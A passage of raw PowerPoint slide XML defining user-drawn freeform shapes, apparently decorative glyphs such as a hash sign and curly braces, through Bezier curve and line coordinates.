                      <a:pt x="69" y="189"/>
                      <a:pt x="69" y="192"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="70" y="194"/>
                      <a:pt x="70" y="195"/>
                      <a:pt x="70" y="197"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="70" y="197"/>
                      <a:pt x="70" y="197"/>
                      <a:pt x="71" y="197"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="73" y="195"/>
                      <a:pt x="73" y="193"/>
                      <a:pt x="72" y="191"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="72" y="188"/>
                      <a:pt x="70" y="186"/>
                      <a:pt x="69" y="184"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="68" y="184"/>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4"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="114" y="173"/>
                      <a:pt x="115" y="172"/>
                      <a:pt x="116" y="173"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="116" y="173"/>
                      <a:pt x="117"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8"/>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7"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4"/>
                      <a:pt x="139" y="131"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="138" y="135"/>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2"/>
                      <a:pt x="97" y="51"/>
                      <a:pt x="94" y="49"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="91" y="49"/>
                      <a:pt x="91" y="47"/>
                      <a:pt x="91" y="44"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="91" y="43"/>
                      <a:pt x="91" y="42"/>
                      <a:pt x="92" y="40"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="93" y="37"/>
                      <a:pt x="95" y="36"/>
                      <a:pt x="98" y="37"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="100" y="37"/>
                      <a:pt x="101" y="38"/>
                      <a:pt x="102" y="40"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="103" y="42"/>
                      <a:pt x="103" y="45"/>
                      <a:pt x="102" y="48"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="102" y="49"/>
                      <a:pt x="101" y="49"/>
                      <a:pt x="102" y="50"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="104" y="51"/>
                      <a:pt x="107" y="50"/>
                      <a:pt x="107" y="48"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="108" y="44"/>
                      <a:pt x="107" y="39"/>
                      <a:pt x="105" y="35"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="104" y="32"/>
                      <a:pt x="100" y="29"/>
                      <a:pt x="96" y="30"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="91" y="30"/>
                      <a:pt x="88" y="33"/>
                      <a:pt x="87" y="38"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="87" y="39"/>
                      <a:pt x="87" y="40"/>
                      <a:pt x="87" y="42"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="87" y="43"/>
                      <a:pt x="87" y="45"/>
                      <a:pt x="87" y="47"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="85" y="45"/>
                      <a:pt x="83" y="46"/>
                      <a:pt x="81" y="46"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="80" y="46"/>
                      <a:pt x="80" y="46"/>
                      <a:pt x="80" y="46"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="78" y="46"/>
                      <a:pt x="78" y="45"/>
                      <a:pt x="78" y="44"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="77" y="41"/>
                      <a:pt x="77" y="39"/>
                      <a:pt x="76" y="36"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="76" y="35"/>
                      <a:pt x="76" y="35"/>
                      <a:pt x="76" y="34"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="75" y="32"/>
                      <a:pt x="73" y="31"/>
                      <a:pt x="70" y="31"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="68" y="31"/>
                      <a:pt x="67" y="32"/>
                      <a:pt x="66" y="34"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="63" y="40"/>
                      <a:pt x="63" y="45"/>
                      <a:pt x="66" y="50"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="66" y="50"/>
                      <a:pt x="67" y="51"/>
                      <a:pt x="68" y="51"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="69" y="51"/>
                      <a:pt x="69" y="50"/>
                      <a:pt x="70" y="49"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="69" y="48"/>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2"/>
                      <a:pt x="66" y="54"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="65" y="54"/>
                      <a:pt x="65" y="56"/>
                      <a:pt x="64" y="57"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="63" y="58"/>
                      <a:pt x="64" y="59"/>
                      <a:pt x="65" y="60"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="66" y="60"/>
                      <a:pt x="67" y="61"/>
                      <a:pt x="68" y="62"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="71" y="66"/>
                      <a:pt x="74" y="66"/>
                      <a:pt x="78" y="66"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="82" y="66"/>
                      <a:pt x="87" y="65"/>
                      <a:pt x="91" y="63"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="95" y="62"/>
                      <a:pt x="98" y="62"/>
                      <a:pt x="101" y="58"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="101" y="58"/>
                      <a:pt x="102" y="58"/>
                      <a:pt x="103" y="58"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="103" y="58"/>
                      <a:pt x="103" y="60"/>
                      <a:pt x="103" y="60"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="103" y="61"/>
                      <a:pt x="102" y="61"/>
                      <a:pt x="102" y="61"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="97" y="63"/>
                      <a:pt x="92" y="65"/>
                      <a:pt x="86" y="67"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="83" y="69"/>
                      <a:pt x="79" y="70"/>
                      <a:pt x="74" y="69"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="73" y="69"/>
                      <a:pt x="72" y="69"/>
                      <a:pt x="71" y="69"/>
                    </a:cubicBezTo>
                    <a:close/>
                    <a:moveTo>
                      <a:pt x="73" y="45"/>
                    </a:moveTo>
                    <a:cubicBezTo>
                      <a:pt x="73" y="43"/>
                      <a:pt x="73" y="41"/>
                      <a:pt x="72" y="40"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="72" y="40"/>
                      <a:pt x="71" y="40"/>
                      <a:pt x="71" y="40"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="71" y="40"/>
                      <a:pt x="70" y="41"/>
                      <a:pt x="70" y="41"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="72" y="41"/>
                      <a:pt x="72" y="43"/>
                      <a:pt x="72" y="44"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="72" y="44"/>
                      <a:pt x="72" y="45"/>
                      <a:pt x="73" y="45"/>
                    </a:cubicBezTo>
                    <a:close/>
                    <a:moveTo>
                      <a:pt x="97" y="39"/>
                    </a:moveTo>
                    <a:cubicBezTo>
                      <a:pt x="99" y="40"/>
                      <a:pt x="99" y="42"/>
                      <a:pt x="100" y="44"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="100" y="43"/>
                      <a:pt x="101" y="43"/>
                      <a:pt x="101" y="43"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="101" y="41"/>
                      <a:pt x="100" y="40"/>
                      <a:pt x="99"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Freeform 157"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr userDrawn="1"/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="2672" y="407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Freeform 158"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr userDrawn="1"/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="2684" y="4073"/>
                <a:ext cx="5" cy="2"/>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Freeform 159"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr userDrawn="1"/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="2043"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Freeform 160"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr userDrawn="1"/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="2193"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Freeform 161"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr userDrawn="1"/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="2342" y="2562"/>
                <a:ext cx="82"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Freeform 162"/>
              <p:cNvSpPr>
                <a:spLocks noEditPoints="1"/>
              </p:cNvSpPr>
              <p:nvPr userDrawn="1"/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="249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Freeform 163"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr userDrawn="1"/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="2687"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Freeform 164"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr userDrawn="1"/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="2837"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8" name="Freeform 165"/>
              <p:cNvSpPr>
                <a:spLocks noEditPoints="1"/>
              </p:cNvSpPr>
              <p:nvPr userDrawn="1"/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="298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Freeform 166"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr userDrawn="1"/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="3182"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3"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="23" y="46"/>
                      <a:pt x="19" y="48"/>
                      <a:pt x="14" y="50"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="9" y="52"/>
                      <a:pt x="5" y="53"/>
                      <a:pt x="0" y="54"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="0" y="31"/>
                      <a:pt x="0" y="31"/>
                      <a:pt x="0" y="31"/>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Freeform 167"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr userDrawn="1"/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="3332"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5" y="39"/>
                      <a:pt x="31" y="41"/>
                      <a:pt x="27" y="43"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="22" y="46"/>
                      <a:pt x="18" y="48"/>
                      <a:pt x="14"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Freeform 168"/>
              <p:cNvSpPr>
                <a:spLocks noEditPoints="1"/>
              </p:cNvSpPr>
              <p:nvPr userDrawn="1"/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="371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Freeform 169"/>
              <p:cNvSpPr>
                <a:spLocks noEditPoints="1"/>
              </p:cNvSpPr>
              <p:nvPr userDrawn="1"/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="3905"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Freeform 170"/>
              <p:cNvSpPr>
                <a:spLocks noEditPoints="1"/>
              </p:cNvSpPr>
              <p:nvPr userDrawn="1"/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="4100"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2" y="36"/>
                      <a:pt x="17" y="27"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="23" y="18"/>
                      <a:pt x="30" y="11"/>
                      <a:pt x="38" y="7"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="46" y="2"/>
                      <a:pt x="55"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Freeform 171"/>
              <p:cNvSpPr>
                <a:spLocks noEditPoints="1"/>
              </p:cNvSpPr>
              <p:nvPr userDrawn="1"/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="4285" y="2567"/>
                <a:ext cx="189" cy="219"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 189 w 189"/>
                  <a:gd name="T1" fmla="*/ 68 h 219"/>
                  <a:gd name="T2" fmla="*/ 184 w 189"/>
                  <a:gd name="T3" fmla="*/ 86 h 219"/>
                  <a:gd name="T4" fmla="*/ 141 w 189"/>
                  <a:gd name="T5" fmla="*/ 86 h 219"/>
                  <a:gd name="T6" fmla="*/ 130 w 189"/>
                  <a:gd name="T7" fmla="*/ 136 h 219"/>
                  <a:gd name="T8" fmla="*/ 178 w 189"/>
                  <a:gd name="T9" fmla="*/ 136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3 w 189"/>
                  <a:gd name="T31" fmla="*/ 136 h 219"/>
                  <a:gd name="T32" fmla="*/ 48 w 189"/>
                  <a:gd name="T33" fmla="*/ 136 h 219"/>
                  <a:gd name="T34" fmla="*/ 57 w 189"/>
                  <a:gd name="T35" fmla="*/ 86 h 219"/>
                  <a:gd name="T36" fmla="*/ 11 w 189"/>
                  <a:gd name="T37" fmla="*/ 86 h 219"/>
                  <a:gd name="T38" fmla="*/ 15 w 189"/>
                  <a:gd name="T39" fmla="*/ 68 h 219"/>
                  <a:gd name="T40" fmla="*/ 61 w 189"/>
                  <a:gd name="T41" fmla="*/ 68 h 219"/>
                  <a:gd name="T42" fmla="*/ 74 w 189"/>
                  <a:gd name="T43" fmla="*/ 0 h 219"/>
                  <a:gd name="T44" fmla="*/ 96 w 189"/>
                  <a:gd name="T45" fmla="*/ 0 h 219"/>
                  <a:gd name="T46" fmla="*/ 82 w 189"/>
                  <a:gd name="T47" fmla="*/ 68 h 219"/>
                  <a:gd name="T48" fmla="*/ 124 w 189"/>
                  <a:gd name="T49" fmla="*/ 68 h 219"/>
                  <a:gd name="T50" fmla="*/ 138 w 189"/>
                  <a:gd name="T51" fmla="*/ 0 h 219"/>
                  <a:gd name="T52" fmla="*/ 159 w 189"/>
                  <a:gd name="T53" fmla="*/ 0 h 219"/>
                  <a:gd name="T54" fmla="*/ 145 w 189"/>
                  <a:gd name="T55" fmla="*/ 68 h 219"/>
                  <a:gd name="T56" fmla="*/ 189 w 189"/>
                  <a:gd name="T57" fmla="*/ 68 h 219"/>
                  <a:gd name="T58" fmla="*/ 121 w 189"/>
                  <a:gd name="T59" fmla="*/ 86 h 219"/>
                  <a:gd name="T60" fmla="*/ 78 w 189"/>
                  <a:gd name="T61" fmla="*/ 86 h 219"/>
                  <a:gd name="T62" fmla="*/ 67 w 189"/>
                  <a:gd name="T63" fmla="*/ 136 h 219"/>
                  <a:gd name="T64" fmla="*/ 110 w 189"/>
                  <a:gd name="T65" fmla="*/ 136 h 219"/>
                  <a:gd name="T66" fmla="*/ 121 w 189"/>
                  <a:gd name="T67" fmla="*/ 8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8"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="184" y="86"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="141" y="86"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="130" y="136"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="178" y="136"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="173" y="153"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="127" y="153"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="112" y="219"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="91" y="219"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="106" y="153"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="65" y="153"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="50" y="219"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="29" y="219"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="43" y="153"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="153"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="3" y="136"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="48" y="136"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="57" y="86"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="11" y="86"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="15" y="68"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="61" y="68"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="74" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="96" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="82" y="68"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="124" y="68"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="138" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="159" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="145" y="68"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="189" y="68"/>
                    </a:lnTo>
                    <a:close/>
                    <a:moveTo>
                      <a:pt x="121" y="86"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="78" y="86"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="67" y="136"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="110" y="136"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="121"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Freeform 172"/>
              <p:cNvSpPr>
                <a:spLocks noEditPoints="1"/>
              </p:cNvSpPr>
              <p:nvPr userDrawn="1"/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="4502"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Freeform 173"/>
              <p:cNvSpPr>
                <a:spLocks noEditPoints="1"/>
              </p:cNvSpPr>
              <p:nvPr userDrawn="1"/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="469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Freeform 174"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr userDrawn="1"/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="4894" y="2562"/>
                <a:ext cx="83"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Freeform 175"/>
              <p:cNvSpPr>
                <a:spLocks noEditPoints="1"/>
              </p:cNvSpPr>
              <p:nvPr userDrawn="1"/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="5043" y="256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1"/>
                      <a:pt x="35" y="196"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="28"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Freeform 176"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr userDrawn="1"/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="5241" y="2562"/>
                <a:ext cx="82"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Freeform 177"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr userDrawn="1"/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="5389"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Freeform 178"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr userDrawn="1"/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="5539"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2" name="Freeform 179"/>
              <p:cNvSpPr>
                <a:spLocks noEditPoints="1"/>
              </p:cNvSpPr>
              <p:nvPr userDrawn="1"/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="5687"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Freeform 180"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr userDrawn="1"/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="5877" y="2567"/>
                <a:ext cx="78" cy="295"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 64 w 64"/>
                  <a:gd name="T1" fmla="*/ 241 h 241"/>
                  <a:gd name="T2" fmla="*/ 22 w 64"/>
                  <a:gd name="T3" fmla="*/ 198 h 241"/>
                  <a:gd name="T4" fmla="*/ 22 w 64"/>
                  <a:gd name="T5" fmla="*/ 157 h 241"/>
                  <a:gd name="T6" fmla="*/ 0 w 64"/>
                  <a:gd name="T7" fmla="*/ 128 h 241"/>
                  <a:gd name="T8" fmla="*/ 0 w 64"/>
                  <a:gd name="T9" fmla="*/ 113 h 241"/>
                  <a:gd name="T10" fmla="*/ 22 w 64"/>
                  <a:gd name="T11" fmla="*/ 83 h 241"/>
                  <a:gd name="T12" fmla="*/ 22 w 64"/>
                  <a:gd name="T13" fmla="*/ 43 h 241"/>
                  <a:gd name="T14" fmla="*/ 64 w 64"/>
                  <a:gd name="T15" fmla="*/ 0 h 241"/>
                  <a:gd name="T16" fmla="*/ 64 w 64"/>
                  <a:gd name="T17" fmla="*/ 18 h 241"/>
                  <a:gd name="T18" fmla="*/ 42 w 64"/>
                  <a:gd name="T19" fmla="*/ 45 h 241"/>
                  <a:gd name="T20" fmla="*/ 42 w 64"/>
                  <a:gd name="T21" fmla="*/ 85 h 241"/>
                  <a:gd name="T22" fmla="*/ 21 w 64"/>
                  <a:gd name="T23" fmla="*/ 120 h 241"/>
                  <a:gd name="T24" fmla="*/ 21 w 64"/>
                  <a:gd name="T25" fmla="*/ 121 h 241"/>
                  <a:gd name="T26" fmla="*/ 42 w 64"/>
                  <a:gd name="T27" fmla="*/ 156 h 241"/>
                  <a:gd name="T28" fmla="*/ 42 w 64"/>
                  <a:gd name="T29" fmla="*/ 195 h 241"/>
                  <a:gd name="T30" fmla="*/ 47 w 64"/>
                  <a:gd name="T31" fmla="*/ 217 h 241"/>
                  <a:gd name="T32" fmla="*/ 64 w 64"/>
                  <a:gd name="T33" fmla="*/ 224 h 241"/>
                  <a:gd name="T34" fmla="*/ 64 w 64"/>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241"/>
                    </a:moveTo>
                    <a:cubicBezTo>
                      <a:pt x="36" y="241"/>
                      <a:pt x="22" y="226"/>
                      <a:pt x="22" y="198"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="22" y="157"/>
                      <a:pt x="22" y="157"/>
                      <a:pt x="22" y="157"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="22" y="139"/>
                      <a:pt x="14" y="129"/>
                      <a:pt x="0" y="128"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="0" y="113"/>
                      <a:pt x="0" y="113"/>
                      <a:pt x="0" y="113"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="14" y="112"/>
                      <a:pt x="22" y="102"/>
                      <a:pt x="22" y="83"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="22" y="43"/>
                      <a:pt x="22" y="43"/>
                      <a:pt x="22" y="43"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="22" y="15"/>
                      <a:pt x="36" y="1"/>
                      <a:pt x="64" y="0"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="64" y="18"/>
                      <a:pt x="64" y="18"/>
                      <a:pt x="64"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3"/>
                      <a:pt x="47" y="217"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="50" y="221"/>
                      <a:pt x="55" y="223"/>
                      <a:pt x="64" y="224"/>
                    </a:cubicBezTo>
                    <a:lnTo>
                      <a:pt x="64"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Freeform 181"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr userDrawn="1"/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="5985" y="2567"/>
                <a:ext cx="77" cy="295"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 63 w 63"/>
                  <a:gd name="T1" fmla="*/ 128 h 241"/>
                  <a:gd name="T2" fmla="*/ 41 w 63"/>
                  <a:gd name="T3" fmla="*/ 157 h 241"/>
                  <a:gd name="T4" fmla="*/ 41 w 63"/>
                  <a:gd name="T5" fmla="*/ 198 h 241"/>
                  <a:gd name="T6" fmla="*/ 0 w 63"/>
                  <a:gd name="T7" fmla="*/ 241 h 241"/>
                  <a:gd name="T8" fmla="*/ 0 w 63"/>
                  <a:gd name="T9" fmla="*/ 224 h 241"/>
                  <a:gd name="T10" fmla="*/ 16 w 63"/>
                  <a:gd name="T11" fmla="*/ 217 h 241"/>
                  <a:gd name="T12" fmla="*/ 21 w 63"/>
                  <a:gd name="T13" fmla="*/ 195 h 241"/>
                  <a:gd name="T14" fmla="*/ 21 w 63"/>
                  <a:gd name="T15" fmla="*/ 156 h 241"/>
                  <a:gd name="T16" fmla="*/ 42 w 63"/>
                  <a:gd name="T17" fmla="*/ 121 h 241"/>
                  <a:gd name="T18" fmla="*/ 42 w 63"/>
                  <a:gd name="T19" fmla="*/ 120 h 241"/>
                  <a:gd name="T20" fmla="*/ 21 w 63"/>
                  <a:gd name="T21" fmla="*/ 85 h 241"/>
                  <a:gd name="T22" fmla="*/ 21 w 63"/>
                  <a:gd name="T23" fmla="*/ 45 h 241"/>
                  <a:gd name="T24" fmla="*/ 0 w 63"/>
                  <a:gd name="T25" fmla="*/ 18 h 241"/>
                  <a:gd name="T26" fmla="*/ 0 w 63"/>
                  <a:gd name="T27" fmla="*/ 0 h 241"/>
                  <a:gd name="T28" fmla="*/ 41 w 63"/>
                  <a:gd name="T29" fmla="*/ 43 h 241"/>
                  <a:gd name="T30" fmla="*/ 41 w 63"/>
                  <a:gd name="T31" fmla="*/ 83 h 241"/>
                  <a:gd name="T32" fmla="*/ 63 w 63"/>
                  <a:gd name="T33" fmla="*/ 113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1" y="139"/>
                      <a:pt x="41" y="157"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="41" y="198"/>
                      <a:pt x="41" y="198"/>
                      <a:pt x="41" y="198"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="41" y="226"/>
                      <a:pt x="27" y="241"/>
                      <a:pt x="0" y="241"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="0" y="224"/>
                      <a:pt x="0" y="224"/>
                      <a:pt x="0" y="224"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="8" y="223"/>
                      <a:pt x="13" y="221"/>
                      <a:pt x="16" y="217"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="20" y="212"/>
                      <a:pt x="21" y="205"/>
                      <a:pt x="21" y="195"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="21" y="156"/>
                      <a:pt x="21" y="156"/>
                      <a:pt x="21" y="156"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="21" y="136"/>
                      <a:pt x="28" y="125"/>
                      <a:pt x="42" y="121"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="42" y="120"/>
                      <a:pt x="42" y="120"/>
                      <a:pt x="42" y="120"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="28" y="116"/>
                      <a:pt x="21" y="104"/>
                      <a:pt x="21" y="85"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="21" y="45"/>
                      <a:pt x="21" y="45"/>
                      <a:pt x="21" y="45"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="21" y="27"/>
                      <a:pt x="14" y="18"/>
                      <a:pt x="0" y="18"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="0" y="0"/>
                      <a:pt x="0" y="0"/>
                      <a:pt x="0" y="0"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="27" y="1"/>
                      <a:pt x="41" y="15"/>
                      <a:pt x="41" y="43"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="41" y="83"/>
                      <a:pt x="41" y="83"/>
                      <a:pt x="41" y="83"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="41" y="102"/>
                      <a:pt x="49" y="112"/>
                      <a:pt x="63" y="113"/>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Freeform 182"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr userDrawn="1"/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="6092" y="2562"/>
